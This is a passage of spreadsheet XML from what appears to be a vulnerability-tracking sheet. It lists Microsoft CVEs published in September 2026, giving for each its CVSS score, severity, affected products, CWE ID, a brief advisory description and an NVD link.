          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69739</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q745" s="5" t="inlineStr"/>
      <c r="R745" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S745" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69744</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr"/>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q746" s="5" t="inlineStr"/>
      <c r="R746" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S746" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69760</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q747" s="5" t="inlineStr"/>
      <c r="R747" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S747" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69793</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr"/>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q748" s="5" t="inlineStr"/>
      <c r="R748" s="5" t="inlineStr">
        <is>
          <t>CWE-1288</t>
        </is>
      </c>
      <c r="S748" s="5" t="inlineStr">
        <is>
          <t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q749" s="5" t="inlineStr"/>
      <c r="R749" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S749" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q750" s="5" t="inlineStr"/>
      <c r="R750" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S750" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69805</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr"/>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q751" s="5" t="inlineStr"/>
      <c r="R751" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-73</t>
        </is>
      </c>
      <c r="S751" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69809</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr"/>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q752" s="5" t="inlineStr"/>
      <c r="R752" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S752" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K75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53" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q753" s="5" t="inlineStr"/>
      <c r="R753" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S753" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K754"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54" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q754" s="5" t="inlineStr"/>
      <c r="R754" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S754" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K75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55" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q755" s="5" t="inlineStr"/>
      <c r="R755" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S755" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q756" s="5" t="inlineStr"/>
      <c r="R756" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S756" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q757" s="5" t="inlineStr"/>
      <c r="R757" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S757" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q758" s="5" t="inlineStr"/>
      <c r="R758" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S758" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q759" s="5" t="inlineStr"/>
      <c r="R759" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S759" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70570</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr"/>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q760" s="5" t="inlineStr"/>
      <c r="R760" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S760" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70579</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr"/>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q761" s="5" t="inlineStr"/>
      <c r="R761" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S761" s="5" t="inlineStr">
        <is>
